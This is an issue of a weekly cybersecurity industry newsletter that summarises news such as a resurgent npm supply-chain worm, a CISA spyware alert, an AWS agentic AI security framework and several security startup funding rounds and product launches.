Welcome to The Cybersecurity Pulse (TCP)! I'm Darwin Salazar, Head of Growth at Monad and former detection engineer in big tech. Each week, I bring you the latest security innovation and industry news. Subscribe to receive weekly updates! 📧

Subscribe now

Share

Reimagine SIEM architecture using AWS S3 Buckets

It’s time to unlock full visibility into your AWS ecosystem. Run federated search, detection, and triage directly across S3 buckets, data lakes, and even your existing SIEM with Vega.

Vega’s Security Analytics Mesh (SAM) analyzes your “data where it lives” with zero disruption. No ingest or egress fees. No swivel chair. No blind spots or data silos.

This is how smart SOC teams build a mesh architecture that’s flexible, cost-efficient and delivers full visibility with AI-driven detection.

Learn about Vega + AWS

Howdy! Short holiday week here in the US. Biggest shopping holiday of the year which also means attackers will be ramping up their shenanigans. Big HugOps to you if you’re a defender in the retail space!

Aside from that, nothing new and exciting to share on a personal front. Lots on the cyber front which we’ll dive into at some point.

Before that though, Happy Thanksgiving to all who celebrate! 🦃 Wishing you a love-filled holiday. Thanksgiving is all about gratitude (it’s in the name). That said, I’m extremely grateful for you, our readers, and our sponsor partners. Your support lets me know that I’m not just yelling into the void and the work I do is actually moving the needle in the space so thank you!

Let’s dive in and have some fun.

TL;DR 📰

• 🪱 Shai-hulud worm resurfaces with nasty new variant – 25K+ repos compromised, now deletes your home directory if exfiltration fails

• 🕸️ AWS releases Agentic AI Security Scoping Matrix – Framework for securing autonomous AI across 4 autonomy levels

• 🎯 US creates Strike Force to take out SE Asian scam centers – DOJ, Treasury, State, DHS combine forces after $9B+ stolen from Americans in 2024

• 📱 CISA warns spyware crews breaking into Signal, WhatsApp – State-backed actors using linked device abuse and zero-click exploits on high-value targets

• 🍀Clover Security launches with $36M – Product Security startup backed by Wiz co-founders, Shlomo Kramer, and SVCI

• 🎭 Doppel raises $70M at $600M valuation – Social engineering defense platform 3x’d valuation in 6 months, CrowdStrike CEO invested personally

• 🔐 Vijil raises $17M for AI agent trust infrastructure – Continuous monitoring and runtime defense for agentic AI

• 🔑 Keycard acquires Runebook for MCP connectivity – AI agent IAM startup adds MCP integration

• 🌐 Guardio lands $80M Series B – Bringing enterprise-grade security to consumers at the browser level

• ☁️ CrowdStrike extends DSPM into runtime – Falcon Data Protection for Cloud now GA with eBPF-based monitoring

• 🧠 Intezer launches Forensic AI SOC – Hybrid AI + deterministic forensics approach, claims 98% accuracy and 4% escalation rate

• 🔍 Infoblox brings DNS threat intel to AWS Network Firewall – One-click deployment, no additional infrastructure

⚒️ Picks of the Week ⚒️

Infamous Shai-hulud Worm Resurfaces From the Depths

Shai-hulud, the self-replicating worm which terrorized open source repos and pkgs 2 months ago is back again with a new, nastier variant which has compromised over 25K repos… that’s a lot of repos.. And it’s not just any repos, we’re talking repos heavily relied on by enterprises and the open-source ecosystem.

This variant executes malicious code during the preinstall phase, expanding exposure to both build and runtime environments, and targets credentials across GitHub, Azure, AWS, GCP, and NPM. If exfiltration fails, it deletes every writable file in the victim’s home directory, a destructive fallback that marks a shift from pure data theft to punitive sabotage.

These new persistence mechanisms suggest the actors want long-term footholds, not just credential harvestong. Popular projects from ENS Domains, PostHog, Postman, and Zapier have been compromised, and the campaign remains ongoing despite GitHub’s removal efforts. *inserts ‘everything is fine’ dumpster fire meme*

The Agentic AI Security Scoping Matrix: framework for securing autonomous AI

AWS released a framework for securing agentic AI systems and it’s a great primer on how to think about agency, autonomy, and all the security risks that come with it. The framework highlights 4 levels/scopes of autonomy for agents and how to secure each scope across different security dimensions (i.e., IAM, logging, data etc.).

Highly recommend reading this if you’re touching or thinking about AI security at all.

US Creates ‘Strike Force’ to Take Out SE Asian Scam Centers

Southeast (SE) Asian cyber criminals defrauded Americans out of $9B+ in 2024 and SE victims out of $18-37B in 2023. I’d say that number is probably 1.5-2x larger due to underreporting. Yes, this is a shit ton of money but what’s worse is that these are highly organized operations ran off the back of “forced labor” of an estimated 400k+ people at scam compounds in Burma, Cambodia, and Laos.

The US govt. recently put together a strike force made up of the DOJ, Treasury, State, and DHS to aid law enforcement, diplomatic pressure, sanctions, and crypto tracing capabilities. Bad news for the bad guys.

The Beekeeper movie with Jason Statham is a great movie to watch to better understand the scam call center economy. Actual conditions are much worse, but this gives you a good glimpse.

Zscaler reports strong Q1 FY26 earnings

Zscaler reported earnings on a strong Q1 ‘FY26 yesterday, but shares dropped ~7% after-hours due to lowered guidance for Q2. 26% growth on ARR is pretty impressive for a company of Zscaler’s size. It’s proving that their still a leader in the SASE space and w/ the recent SplxAI acquisition +FedRAMP moderate auth in the EU, they should be generating even more pipeline soon.

The Numbers:

• Quarterly Revenue: $788.1M (up 26% YoY)

• Cash flow from ops: $448.3M, up from $331.3M

• Deferred revenue: $2.35B, up 32% YoY (healthy pipeline)

You can dig into all their Q1 earnings assets here.

CISA warns spyware crews are breaking into Signal and WhatsApp accounts

The US CISA recently issued an alert warning that state-backed actors and commercial spyware operators are actively targeting Signal and WhatsApp users through linked device abuse, zero-click exploits, and spoofed apps. Targets include senior government/military officials and civil society groups across the US, Middle East, and Europe.

I have lots of thoughts on this. Not enough time or space to discuss here. However, this Darknet Diaries episode encapsulated the 0-day and nation-state actor economy that produces and fuels these types of novel, sophisticated attacks.

🔮 The Future of Security 🔮

AI Security

Vijil raises $17M to safeguard AI agents continuously

Vijil raised $17M to build “trust infrastructure” for AI agents, offering continuous monitoring, runtime defense, and automated compliance. Total raised now $23M. Backed by BrightMind Partners, Mayfield and Gradient.

More AI Security news ⬇️

• Secure.com Raises $4.5 Million for Agentic Security

Application Security

Clover Security launches with $36M + 40 head count

Product security startup out of Tel Aviv. Backed by superstar angels like Wiz co-founders, Shlomo Kramer (Cato, Checkpoint, Imperva). Also backed by SVCI. Their aim is to make security a natural and automated part of the software building process.

Approach makes a lot of sense to me given the AI code gen boom + trajectory we’re headed in. Super slick website and branding. This company is one to watch.

More AppSec news ⬇️

• Microsoft and GitHub Preview New Tool That Identifies, Prioritizes, and Fixes Vulnerabilities With AI

Consumer Security

Guardio lands $80M to expand AI-driven protection for everyday internet users

Guardio raised $80M Series B to bring enterprise-grade security to consumers, with a focus on AI-generated threats. The Tel Aviv-based company operates at the browser level.

Data Security

Falcon Data Protection for Cloud Extends DSPM into Runtime

CrowdStrike announced GA of Falcon Data Protection for Cloud, which extends DSPM into runtime using eBPF-based monitoring.

Identity and Access Management

AI identity startup Keycard acquires Runebook to empower MCP connectivity

Keycard, an AI agent identity and access management startup, acquired Runebook to add simplified MCP (Model Context Protocol) connectivity to its platform. Keycard emerged from stealth last month with $38M from a16z, Acrew, and Boldstart.

More Endpoint Security news ⬇️

• Opti Raises $20 Million for Identity Security Platform

  ---

Network Security

Infoblox Brings DNS-Based Threat Intelligence to AWS Network Firewall

Infoblox launched managed rules for AWS Network Firewall, bringing its DNS-based threat intelligence natively into AWS environments. One-click deployment from the AWS console.
This is huge news given Infoblox easily has a top 3 threat intel team in the market and secures 13K+ med-large environments so their DNS and DDI solutions are best of breed. AWS customers now get some access to that without deploying additional infra.

Social Engineering Security

Doppel Raises $70 Million at $600 Million Valuation

Doppel raised $70M Series C at a $600M+ valuation, just six months after its Series B (3x valuation jump). The “social engineering defense” platform fights AI-powered impersonation, phishing, and deepfakes. CrowdStrike CEO George Kurtz has personally invested.

Security Operations

Introducing Intezer Forensic AI SOC

Intezer launched “Forensic AI SOC,” positioning it as a hybrid approach that combines AI agents with deterministic forensic tools rather than pure LLM-based triage. Claims 98% accuracy, sub-minute triage, and only 4% of alerts escalated for human review. Strong customer proof and testimonial from MGM resorts CTO so we know it’s not just fluff.

This does take a stab at the MDR market, but that’s been a given since the inception of AI SOC. MDR vendors need to evolve fast or acquire AI SOC capabilities. Kudos to Intezer on this launch.

Why security data lakes power AI in the SOC, with Cliff Crosland at Scanner.dev

This is a great discussion on how two emerging solutions can work together to deliver better security outcomes. AI of any kind is only as good as the quality, quantity, and diversity of the data it is fed. Scanner CEO, Cliff Crossland, is noticing a trend where customers are pairing their data lake with AI and good things are happening.

More SecOps news ⬇️

• Exabeam and Recorded Future Bring Intelligence-Led Threat Detection to the SOC

Interested in sponsoring TCP?

Sponsoring TCP not only helps me continue to bring you the latest in security innovation, but it also connects you to a dedicated audience of 20,000+ CISOs, practitioners, founders, and investors across 125+ countries 🌎

👉 Learn more here!

Bye for now 👋🏽

That’s all for this week… ¡Nos vemos la próxima semana!